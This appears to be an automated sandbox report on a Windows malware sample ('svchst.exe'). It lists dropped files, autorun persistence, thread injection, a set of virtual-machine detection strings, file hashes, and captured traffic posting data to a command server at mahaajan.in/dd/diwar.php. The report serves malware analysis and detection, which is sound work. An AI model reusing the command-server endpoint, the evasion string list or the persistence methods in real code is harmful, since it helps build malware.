JBX Analysis Report

Loading ...

General Information
Number of analysed new started processes analysed: 4
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Success Statistics:
  • POIButNoSDmp: 0
  • BadPOI: 6
  • TotalInputPOI: 312
  • UnresolvedImplicitCalls: 188
  • ResolvedImplicitCalls: 242
  • NoCallBeforePOI: 0
  • POIImplicitCalls: 167
  • POIFound: 306
  • AllImplicitCalls: 597
Warnings:
  • Too many NtQueryDirectoryFile calls (excessive behavior)
  • Too many NtProtectVirtualMemory calls (excessive behavior)

Classification / Threat Score
Persistence, Installation, Boot Survival :
Hiding, Stealthiness, Detection and Removal Protection :
Security Solution / Mechanism bypass, termination and removal, Anti Debugging, VM Detection :
Spreading :
Exploiting :
Networking :
Data spying, Sniffing, Keylogging, Ebanking Fraud :

Matching Signatures
Behavior Signatures
Creates files inside the user directory
Queries a list of all running processes
Spawns processes
Urls found in memory or binary data
AV process strings found (often used to terminate AV products)
Binary contains a suspicious time stamp
Binary may include packed or crypted data
Checks if the current process is beeing debugged
Creates an autostart registry key
Creates files inside the system directory
Creates mutexes \BaseNamedObjects\Local\c:!documents and settings!networkservice!local settings!temporary internet files!content.ie5! \BaseNamedObjects\Local\c:!documents and settings!networkservice!cookies! \BaseNamedObjects\Local\c:!documents and settings!networkservice!local settings!history!history.ie5!
Drops PE files
Enumerates the file system
Found strings which match to known social media urls
May tried to detect the virtual machine to hinder analysis (VM artifact strings found in memory)
PE sections with suspicious entropy found
Performs DNS lookups
Posts data to webserver
Contains capabilities to detect virtual machines
Creates autorun.inf (USB autostart)
Modifies the context of a thread in another process (thread injection)
Shows file infector / information gathering behavior (enumerates multiple directory for files)

Code Signatures
Contains functionality to download additional files from the internet
Contains functionality to enumerate / list files inside a directory
Contains functionality to query local / system time
Contains functionality to start windows services
Contains functionality to dynamically determine API calls

Startup
  • svchst.exe (PID: 1508 MD5: 6B16C4526A013E744B3D91CD7A091C36)
    • svchst.exe (PID: 1616 MD5: 6B16C4526A013E744B3D91CD7A091C36)

Created / dropped Files
File Path MD5
C:\Documents and Settings\NetworkService\Local Settings\Application Data\sLT.exf E94FCAB2699C22CF69387EA0EE892968
C:\WINDOWS\mssys.dll 879631FB71EEF07DB32A97E8DAD372EA
C:\WINDOWS\svchst.exe 6B16C4526A013E744B3D91CD7A091C36
C:\autorun.inf 22E7E2047F46662384F91EAC7EFCC806
\ROUTER DF3F6F25E4716A933F765B3AE24BC869
\net\NtControlPipe20 5DBF9AB5CA0D05D4E1865D918572E54B

Contacted Domains
No contacted domains info

Contacted IPs
No contacted IP infos

Static File Info
File type: Users\admin\Desktop\vm_tricks_sample; PE32 executable for MS Windows (GUI) Intel 80386 32-bit
File name: vm_tricks_sample
File size: 196608
MD5: 6b16c4526a013e744b3d91cd7a091c36
SHA1: 610e916e1f3c5c9faebdd539d9ff2d82a807e1e2
SHA256: f7e1cb9f307794648443497824a72af7c22a6fd77ad67698affc5979172750a2
SHA512: 2ece4f9afee77f8bdd9e6b37c95e5e51632d8628d8946b7e52f1518ca6397b757f89e2e21b153cb8c85eb854afca34cc871ef7f07a0c2ee194a6965c833d5274

Static PE Info
General
Entrypoint: 0x41611c
Entrypoint Section: .text
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: 32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics: TERMINAL_SERVER_AWARE
Time Stamp: 0x81C4B2F8 [Tue Dec 28 12:22:16 2038 UTC]
TLS Callbacks:
Resources
Name RVA Size Type Language Country
RT_RCDATA 0x1906c 0x12600 ump; data
Imports
DLL Import
ntdll.dll NtUnmapViewOfSection
WS2_32.dll WSAConnect, WSASocketA
WININET.dll InternetGetConnectedState
KERNEL32.dll HeapAlloc, CloseHandle, HeapFree, WriteFile, CreateFileA, SetFilePointer, GetProcessHeap, ExitProcess, GetCommandLineA, GetStartupInfoA, GetModuleHandleA, DeleteFileA
USER32.dll wvsprintfA
Sections
Name Virtual Address Virtual Size Raw Size Entropy
.text 0x1000 0x18000 0x18000 7.15986996647
.rsrc 0x19000 0x1266c 0x12800 7.85865882135
.reloc 0x2c000 0x5600 0x5400 2.2117994718

String Analysis
URLs
String value Source
http://grub.org) vm_tricks_sample.exe, svchst.exe
http://help.naver.com/delete_main.asp) vm_tricks_sample.exe, svchst.exe
http://mahaajan.in/dd/ svchst.exe, vm_tricks_sample, svchst.exe.dr
http://mahaajan.in/dd/diwar.php vm_tricks_sample.exe, svchst.exe
http://sp.ask.com/docs/about/tech_crawling.html) vm_tricks_sample.exe, svchst.exe
http://www.ba.be) vm_tricks_sample.exe, svchst.exe
http://www.changedetection.com/bot.html vm_tricks_sample.exe, svchst.exe
http://www.cnet.com/) vm_tricks_sample.exe, svchst.exe
http://www.google.com/bot.html) svchst.exe
http://www.net-promoter.com/) vm_tricks_sample.exe, svchst.exe
http://www.netnose.com) vm_tricks_sample.exe, svchst.exe
http://www.powerset.com) vm_tricks_sample.exe, svchst.exe
http://www.searchhippo.com/; vm_tricks_sample.exe, svchst.exe
http://www.wisenutbot.com) vm_tricks_sample.exe, svchst.exe
AV process names
String value Source
Autoruns.exe svchst.exe, svchst.exe.dr
Social media names
String value Source
Mozilla/4.0 (compatible; Yahoo Japan; for robot study; kasugiya) equals www.yahoo.com (Yahoo) vm_tricks_sample.exe, svchst.exe
VM Artifacts
String value Source
VBoxMouse svchst.exe.dr
xenvdb svchst.exe.dr
vmdebug svchst.exe.dr
VBoxService svchst.exe.dr
vpcbus svchst.exe.dr
vmicvss svchst.exe.dr
vpcuhub svchst.exe.dr
vmwaretray.exe svchst.exe.dr
vmware svchst.exe.dr
xennet6 svchst.exe.dr
vmusrvc.exe svchst.exe, vm_tricks_sample, svchst.exe.dr
VBOX__ svchst.exe, vm_tricks_sample, svchst.exe.dr
xensvc svchst.exe.dr
xenevtchn svchst.exe.dr
vmicexchange svchst.exe.dr
VMTools svchst.exe.dr
xennet svchst.exe.dr
VBoxSF svchst.exe.dr
vpc-s3 svchst.exe.dr
VMMEMCTL svchst.exe.dr
vmwareuser.exe svchst.exe.dr
VBoxGuest svchst.exe.dr
vmicshutdown svchst.exe.dr
Hyper-V svchst.exe, vm_tricks_sample, svchst.exe.dr
vmsrvc.exe svchst.exe.dr
vboxtray.exe svchst.exe, vm_tricks_sample, svchst.exe.dr
msvmmouf svchst.exe.dr
VirtualMachine svchst.exe, vm_tricks_sample, svchst.exe.dr
vmicheartbeat svchst.exe.dr
vmmouse svchst.exe.dr
vboxservice.exe svchst.exe.dr

Network Behavior
TCP Packets
Timestamp Source Port Dest Port Source IP Dest IP
Okt 12, 2012 14:46:29.692397118 MESZ 1039 80 192.168.0.10 208.91.198.109
Okt 12, 2012 14:46:29.692428112 MESZ 80 1039 208.91.198.109 192.168.0.10
Okt 12, 2012 14:46:29.692787886 MESZ 1039 80 192.168.0.10 208.91.198.109
Okt 12, 2012 14:46:29.695838928 MESZ 1039 80 192.168.0.10 208.91.198.109
Okt 12, 2012 14:46:29.695852041 MESZ 80 1039 208.91.198.109 192.168.0.10
Okt 12, 2012 14:46:30.878057003 MESZ 80 1039 208.91.198.109 192.168.0.10
Okt 12, 2012 14:46:31.025012970 MESZ 1039 80 192.168.0.10 208.91.198.109
Okt 12, 2012 14:46:31.132304907 MESZ 80 1039 208.91.198.109 192.168.0.10
Okt 12, 2012 14:46:31.133229971 MESZ 1039 80 192.168.0.10 208.91.198.109
Okt 12, 2012 14:46:31.133299112 MESZ 80 1039 208.91.198.109 192.168.0.10
Okt 12, 2012 14:46:31.133637905 MESZ 1039 80 192.168.0.10 208.91.198.109
UDP Packets
Timestamp Source Port Dest Port Source IP Dest IP
Okt 12, 2012 14:46:22.548973083 MESZ 61120 53 192.168.0.10 195.186.1.121
Okt 12, 2012 14:46:22.549093008 MESZ 53 61120 195.186.1.121 192.168.0.10
Okt 12, 2012 14:46:22.549518108 MESZ 61120 53 192.168.0.10 195.186.4.121
Okt 12, 2012 14:46:22.549561024 MESZ 53 61120 195.186.4.121 192.168.0.10
Okt 12, 2012 14:46:24.482346058 MESZ 51208 53 192.168.0.10 195.186.1.121
Okt 12, 2012 14:46:24.482446909 MESZ 53 51208 195.186.1.121 192.168.0.10
Okt 12, 2012 14:46:24.482691050 MESZ 51208 53 192.168.0.10 195.186.4.121
Okt 12, 2012 14:46:24.482727051 MESZ 53 51208 195.186.4.121 192.168.0.10
Okt 12, 2012 14:46:25.305315018 MESZ 56719 53 192.168.0.10 195.186.1.121
Okt 12, 2012 14:46:26.293629885 MESZ 56719 53 192.168.0.10 195.186.4.121
Okt 12, 2012 14:46:27.290111065 MESZ 56719 53 192.168.0.10 195.186.1.121
Okt 12, 2012 14:46:29.292324066 MESZ 56719 53 192.168.0.10 195.186.1.121
Okt 12, 2012 14:46:29.292573929 MESZ 56719 53 192.168.0.10 195.186.4.121
Okt 12, 2012 14:46:29.633065939 MESZ 53 56719 195.186.1.121 192.168.0.10
Okt 12, 2012 14:46:30.600799084 MESZ 53 56719 195.186.4.121 192.168.0.10
Okt 12, 2012 14:46:30.647813082 MESZ 53 56719 195.186.1.121 192.168.0.10
Okt 12, 2012 14:46:32.206891060 MESZ 53 56719 195.186.1.121 192.168.0.10
Okt 12, 2012 14:46:32.264456987 MESZ 53 56719 195.186.4.121 192.168.0.10
ICMP Packets
Timestamp Source IP Dest IP Checksum Code Type
Okt 12, 2012 14:46:30.601129055 MESZ 192.168.0.10 195.186.4.121 8629 (Port unreachable) Destination Unreachable
Okt 12, 2012 14:46:30.648020029 MESZ 192.168.0.10 195.186.1.121 8329 (Port unreachable) Destination Unreachable
Okt 12, 2012 14:46:32.207338095 MESZ 192.168.0.10 195.186.1.121 8329 (Port unreachable) Destination Unreachable
Okt 12, 2012 14:46:32.264925003 MESZ 192.168.0.10 195.186.4.121 8629 (Port unreachable) Destination Unreachable
DNS Queries
Timestamp Source IP Dest IP Trans ID OP Code Name Type Class
Okt 12, 2012 14:46:22.548973083 MESZ 192.168.0.10 195.186.1.121 0x2cd5 Standard query (0) http://mahaajan.in/dd/ A (IP address) IN (0x0001)
Okt 12, 2012 14:46:22.549518108 MESZ 192.168.0.10 195.186.4.121 0x2cd5 Standard query (0) http://mahaajan.in/dd/ A (IP address) IN (0x0001)
Okt 12, 2012 14:46:24.482346058 MESZ 192.168.0.10 195.186.1.121 0x2c1b Standard query (0) http://mahaajan.in/dd/ A (IP address) IN (0x0001)
Okt 12, 2012 14:46:24.482691050 MESZ 192.168.0.10 195.186.4.121 0x2c1b Standard query (0) http://mahaajan.in/dd/ A (IP address) IN (0x0001)
Okt 12, 2012 14:46:25.305315018 MESZ 192.168.0.10 195.186.1.121 0xab84 Standard query (0) mahaajan.in A (IP address) IN (0x0001)
Okt 12, 2012 14:46:26.293629885 MESZ 192.168.0.10 195.186.4.121 0xab84 Standard query (0) mahaajan.in A (IP address) IN (0x0001)
Okt 12, 2012 14:46:27.290111065 MESZ 192.168.0.10 195.186.1.121 0xab84 Standard query (0) mahaajan.in A (IP address) IN (0x0001)
Okt 12, 2012 14:46:29.292324066 MESZ 192.168.0.10 195.186.1.121 0xab84 Standard query (0) mahaajan.in A (IP address) IN (0x0001)
Okt 12, 2012 14:46:29.292573929 MESZ 192.168.0.10 195.186.4.121 0xab84 Standard query (0) mahaajan.in A (IP address) IN (0x0001)
DNS Answers
Timestamp Source IP Dest IP Trans ID Replay Code Name CName Address Type Class
Okt 12, 2012 14:46:22.549093008 MESZ 195.186.1.121 192.168.0.10 0x2cd5 Server failure (2) http://mahaajan.in/dd/ none none A (IP address) IN (0x0001)
Okt 12, 2012 14:46:22.549561024 MESZ 195.186.4.121 192.168.0.10 0x2cd5 Server failure (2) http://mahaajan.in/dd/ none none A (IP address) IN (0x0001)
Okt 12, 2012 14:46:24.482446909 MESZ 195.186.1.121 192.168.0.10 0x2c1b Server failure (2) http://mahaajan.in/dd/ none none A (IP address) IN (0x0001)
Okt 12, 2012 14:46:24.482727051 MESZ 195.186.4.121 192.168.0.10 0x2c1b Server failure (2) http://mahaajan.in/dd/ none none A (IP address) IN (0x0001)
Okt 12, 2012 14:46:29.633065939 MESZ 195.186.1.121 192.168.0.10 0xab84 No error (0) mahaajan.in 208.91.198.109 A (IP address) IN (0x0001)
Okt 12, 2012 14:46:30.600799084 MESZ 195.186.4.121 192.168.0.10 0xab84 No error (0) mahaajan.in 208.91.198.109 A (IP address) IN (0x0001)
Okt 12, 2012 14:46:30.647813082 MESZ 195.186.1.121 192.168.0.10 0xab84 No error (0) mahaajan.in 208.91.198.109 A (IP address) IN (0x0001)
Okt 12, 2012 14:46:32.206891060 MESZ 195.186.1.121 192.168.0.10 0xab84 No error (0) mahaajan.in 208.91.198.109 A (IP address) IN (0x0001)
Okt 12, 2012 14:46:32.264456987 MESZ 195.186.4.121 192.168.0.10 0xab84 No error (0) mahaajan.in 208.91.198.109 A (IP address) IN (0x0001)
HTTP Request Dependency Graph
  • mahaajan.in
HTTP Packets
Timestamp Source Port Dest Port Source IP Dest IP Header Total Bytes Transfered (KB)
Okt 12, 2012 14:46:29.695838928 MESZ 1039 80 192.168.0.10 208.91.198.109 POST /dd/diwar.php HTTP/1.0
Host: mahaajan.in
Keep-Alive: 300
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US)
Content-Type: application/x-www-form-urlencoded
Content-Length: 34
 1
Okt 12, 2012 14:46:30.878057003 MESZ 80 1039 208.91.198.109 192.168.0.10 HTTP/1.1 500 Internal Server Error
Date: Fri, 12 Oct 2012 12:46:30 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 mod_fcgid/2.3.6
Content-Length: 688
Connection: close
Content-Type: text/html; charset=iso-8859-1
 2

Code Manipulation Behavior

System Behavior

Analysis Process: vm_tricks_sample.exe PID: 484 Parent PID: 504

General
Start time: 09:39:49
Start date: 24/01/2012
Path: C:\vm_tricks_sample.exe
Wow64 process (32bit): false
Commandline: unknown
Imagebase: 0x400000
File size: 196608 bytes
MD5 hash: 6B16C4526A013E744B3D91CD7A091C36

File Activites
File Opened
File Path Access Options Content overwritten Completion Count Source Address Symbol
y: read attributes and synchronize synchronous io non alert and non directory file false object name not found 2 414288 GetDriveTypeA
x: read attributes and synchronize synchronous io non alert and non directory file false object name not found 2 414288 GetDriveTypeA
w: read attributes and synchronize synchronous io non alert and non directory file false object name not found 2 414288 GetDriveTypeA
v: read attributes and synchronize synchronous io non alert and non directory file false object name not found 2 414288 GetDriveTypeA
u: read attributes and synchronize synchronous io non alert and non directory file false object name not found 2 414288 GetDriveTypeA
t: read attributes and synchronize synchronous io non alert and non directory file false object name not found 2 414288 GetDriveTypeA
s: read attributes and synchronize synchronous io non alert and non directory file false object name not found 2 414288 GetDriveTypeA
r: read attributes and synchronize synchronous io non alert and non directory file false object name not found 2 414288 GetDriveTypeA
q: read attributes and synchronize synchronous io non alert and non directory file false object name not found 2 414288 GetDriveTypeA
p: read attributes and synchronize synchronous io non alert and non directory file false object name not found 2 414288 GetDriveTypeA
o: read attributes and synchronize synchronous io non alert and non directory file false object name not found 2 414288 GetDriveTypeA
n: read attributes and synchronize synchronous io non alert and non directory file false object name not found 2 414288 GetDriveTypeA
m: read attributes and synchronize synchronous io non alert and non directory file false object name not found 2 414288 GetDriveTypeA
l: read attributes and synchronize synchronous io non alert and non directory file false object name not found 2 414288 GetDriveTypeA
k: read attributes and synchronize synchronous io non alert and non directory file false object name not found 2 414288 GetDriveTypeA
j: read attributes and synchronize synchronous io non alert and non directory file false object name not found 2 414288 GetDriveTypeA
i: read attributes and synchronize synchronous io non alert and non directory file false object name not found 2 414288 GetDriveTypeA
h: read attributes and synchronize synchronous io non alert and non directory file false object name not found 2 414288 GetDriveTypeA
g: read attributes and synchronize synchronous io non alert and non directory file false object name not found 2 414288 GetDriveTypeA
f: read attributes and synchronize synchronous io non alert and non directory file false object name not found 2 414288 GetDriveTypeA
e: read attributes and synchronize synchronous io non alert and non directory file false object name not found 2 414288 GetDriveTypeA
File Created
File Path Access Attributes Options Completion Count Source Address Symbol
C:\WINDOWS\mssys.dll read attributes and synchronize and generic write system synchronous io non alert and non directory file success or wait 1 413FC0 CreateFileA
File Written
File Path Offset Length Value Completion Count Source Address Symbol
C:\WINDOWS\mssys.dll unknown 67072 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 f6 40 00 c3 b2 21 6e 90 b2 21 6e 90 b2 21 6e 90 ac 73 ea 90 90 21 6e 90 ac 73 fb 90 a2 21 6e 90 ac 73 ed 90 df 21 6e 90 95 e7 15 90 b1 21 6e 90 b2 21 6f 90 d3 21 6e 90 ac 73 e7 90 b5 21 6e 90 ac 73 ff 90 b3 21 6e 90 52 69 63 68 b2 21 6e 90 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 5d 34 88 4f 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 09 00 00 00 01 00 00 10 00 00 00 b0 05 success or wait 1 414018 WriteFile
File Path Offset Length Completion Count Source Address Symbol
Directory Information Queried
File Path Disposition File Mask Completion Count Source Address Symbol
C:\Documents and Settings\Administrator\Application Data BothDirectoryInformation <.exe no such file 1 41410C FindFirstFileA
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp BothDirectoryInformation <.exe no such file 1 41410C FindFirstFileA
C:\WINDOWS\Web BothDirectoryInformation <.exe no such file 1 41410C FindFirstFileA
\;Z:0000000000008bf9\192.168.0.2\xpanalyzer1\ BothDirectoryInformation * success or wait 1 41410C FindFirstFileA
\;Z:0000000000008bf9\192.168.0.2\xpanalyzer1\ BothDirectoryInformation unknown success or wait 1 4141FC FindNextFileA
\;Z:0000000000008bf9\192.168.0.2\xpanalyzer1\export\ BothDirectoryInformation * success or wait 1 41410C FindFirstFileA
\;Z:0000000000008bf9\192.168.0.2\xpanalyzer1\export\ BothDirectoryInformation unknown success or wait 1 4141FC FindNextFileA
\;Z:0000000000008bf9\192.168.0.2\xpanalyzer1\export\ BothDirectoryInformation unknown no more files 1 4141FC FindNextFileA
\;Z:0000000000008bf9\192.168.0.2\xpanalyzer1\syscalls\ BothDirectoryInformation * success or wait 1 41410C FindFirstFileA
\;Z:0000000000008bf9\192.168.0.2\xpanalyzer1\syscalls\ BothDirectoryInformation unknown success or wait 1 4141FC FindNextFileA
\;Z:0000000000008bf9\192.168.0.2\xpanalyzer1\syscalls\dump\ BothDirectoryInformation * success or wait 1 41410C FindFirstFileA
\;Z:0000000000008bf9\192.168.0.2\xpanalyzer1\syscalls\dump\ BothDirectoryInformation unknown success or wait 1 4141FC FindNextFileA
\;Z:0000000000008bf9\192.168.0.2\xpanalyzer1\syscalls\dump\ BothDirectoryInformation unknown no more files 1 4141FC FindNextFileA
\;Z:0000000000008bf9\192.168.0.2\xpanalyzer1\syscalls\ BothDirectoryInformation unknown no more files 1 4141FC FindNextFileA
\;Z:0000000000008bf9\192.168.0.2\xpanalyzer1\logs\ BothDirectoryInformation * success or wait 1 41410C FindFirstFileA
\;Z:0000000000008bf9\192.168.0.2\xpanalyzer1\logs\ BothDirectoryInformation unknown success or wait 1 4141FC FindNextFileA
\;Z:0000000000008bf9\192.168.0.2\xpanalyzer1\logs\ BothDirectoryInformation unknown no more files 1 4141FC FindNextFileA
\;Z:0000000000008bf9\192.168.0.2\xpanalyzer1\udf\ BothDirectoryInformation * success or wait 1 41410C FindFirstFileA
\;Z:0000000000008bf9\192.168.0.2\xpanalyzer1\udf\ BothDirectoryInformation unknown success or wait 1 4141FC FindNextFileA
\;Z:0000000000008bf9\192.168.0.2\xpanalyzer1\udf\ BothDirectoryInformation unknown no more files 1 4141FC FindNextFileA
\;Z:0000000000008bf9\192.168.0.2\xpanalyzer1\import\ BothDirectoryInformation * success or wait 1 41410C FindFirstFileA
\;Z:0000000000008bf9\192.168.0.2\xpanalyzer1\import\ BothDirectoryInformation unknown success or wait 1 4141FC FindNextFileA
\;Z:0000000000008bf9\192.168.0.2\xpanalyzer1\import\shoots\ BothDirectoryInformation * success or wait 1 41410C FindFirstFileA
\;Z:0000000000008bf9\192.168.0.2\xpanalyzer1\import\shoots\ BothDirectoryInformation unknown success or wait 1 4141FC FindNextFileA
\;Z:0000000000008bf9\192.168.0.2\xpanalyzer1\import\shoots\ BothDirectoryInformation unknown no more files 1 4141FC FindNextFileA
\;Z:0000000000008bf9\192.168.0.2\xpanalyzer1\import\ BothDirectoryInformation unknown no more files 1 4141FC FindNextFileA
\;Z:0000000000008bf9\192.168.0.2\xpanalyzer1\ BothDirectoryInformation unknown no more files 1 4141FC FindNextFileA
C:\ BothDirectoryInformation * success or wait 1 41410C FindFirstFileA
C:\ BothDirectoryInformation unknown success or wait 1 4141FC FindNextFileA
C:\Documents and Settings BothDirectoryInformation * success or wait 1 41410C FindFirstFileA
C:\Documents and Settings BothDirectoryInformation unknown success or wait 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator BothDirectoryInformation * success or wait 1 41410C FindFirstFileA
C:\Documents and Settings\Administrator BothDirectoryInformation unknown success or wait 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data BothDirectoryInformation * success or wait 1 41410C FindFirstFileA
C:\Documents and Settings\Administrator\Application Data BothDirectoryInformation unknown success or wait 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Adobe BothDirectoryInformation * success or wait 1 41410C FindFirstFileA
C:\Documents and Settings\Administrator\Application Data\Adobe BothDirectoryInformation unknown success or wait 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat BothDirectoryInformation * success or wait 1 41410C FindFirstFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat BothDirectoryInformation unknown success or wait 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0 BothDirectoryInformation * success or wait 1 41410C FindFirstFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0 BothDirectoryInformation unknown success or wait 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\Collab BothDirectoryInformation * success or wait 1 41410C FindFirstFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\Collab BothDirectoryInformation unknown success or wait 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\Collab BothDirectoryInformation unknown no more files 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\Forms BothDirectoryInformation * success or wait 1 41410C FindFirstFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\Forms BothDirectoryInformation unknown success or wait 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\Forms BothDirectoryInformation unknown no more files 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\JavaScripts BothDirectoryInformation * success or wait 1 41410C FindFirstFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\JavaScripts BothDirectoryInformation unknown success or wait 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\JavaScripts BothDirectoryInformation unknown no more files 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0 BothDirectoryInformation unknown no more files 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat BothDirectoryInformation unknown no more files 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Flash Player BothDirectoryInformation * success or wait 1 41410C FindFirstFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Flash Player BothDirectoryInformation unknown success or wait 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Flash Player\AssetCache BothDirectoryInformation * success or wait 1 41410C FindFirstFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Flash Player\AssetCache BothDirectoryInformation unknown success or wait 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Flash Player\AssetCache\4LU5DXRW BothDirectoryInformation * success or wait 1 41410C FindFirstFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Flash Player\AssetCache\4LU5DXRW BothDirectoryInformation unknown success or wait 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Flash Player\AssetCache\4LU5DXRW BothDirectoryInformation unknown no more files 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Flash Player\AssetCache BothDirectoryInformation unknown no more files 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Flash Player BothDirectoryInformation unknown no more files 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics BothDirectoryInformation * success or wait 1 41410C FindFirstFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics BothDirectoryInformation unknown success or wait 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries BothDirectoryInformation * success or wait 1 41410C FindFirstFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries BothDirectoryInformation unknown success or wait 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary BothDirectoryInformation * success or wait 1 41410C FindFirstFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary BothDirectoryInformation unknown success or wait 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\all BothDirectoryInformation * success or wait 1 41410C FindFirstFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\all BothDirectoryInformation unknown success or wait 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\all BothDirectoryInformation unknown no more files 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\grm BothDirectoryInformation * success or wait 1 41410C FindFirstFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\grm BothDirectoryInformation unknown success or wait 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\grm BothDirectoryInformation unknown no more files 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\sgr BothDirectoryInformation * success or wait 1 41410C FindFirstFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\sgr BothDirectoryInformation unknown success or wait 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\sgr BothDirectoryInformation unknown no more files 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary BothDirectoryInformation unknown no more files 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries BothDirectoryInformation unknown no more files 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics BothDirectoryInformation unknown no more files 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Adobe BothDirectoryInformation unknown no more files 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Identities BothDirectoryInformation * success or wait 1 41410C FindFirstFileA
C:\Documents and Settings\Administrator\Application Data\Identities BothDirectoryInformation unknown success or wait 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Identities\{5223274D-42A6-41C5-9E78-3A6606A65E5E} BothDirectoryInformation * success or wait 1 41410C FindFirstFileA
C:\Documents and Settings\Administrator\Application Data\Identities\{5223274D-42A6-41C5-9E78-3A6606A65E5E} BothDirectoryInformation unknown success or wait 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Identities\{5223274D-42A6-41C5-9E78-3A6606A65E5E} BothDirectoryInformation unknown no more files 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Identities BothDirectoryInformation unknown no more files 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Macromedia BothDirectoryInformation * success or wait 1 41410C FindFirstFileA
C:\Documents and Settings\Administrator\Application Data\Macromedia BothDirectoryInformation unknown success or wait 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash Player BothDirectoryInformation * success or wait 1 41410C FindFirstFileA
C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash Player BothDirectoryInformation unknown success or wait 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash Player\#SharedObjects BothDirectoryInformation * success or wait 1 41410C FindFirstFileA
